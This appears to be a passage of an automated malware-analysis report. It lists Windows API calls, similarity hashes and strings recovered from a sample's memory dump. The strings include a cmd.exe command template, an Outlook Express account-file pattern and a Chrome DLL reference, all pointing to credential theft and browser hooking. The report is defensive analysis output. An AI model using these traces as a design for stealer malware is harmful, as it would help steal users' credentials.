    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
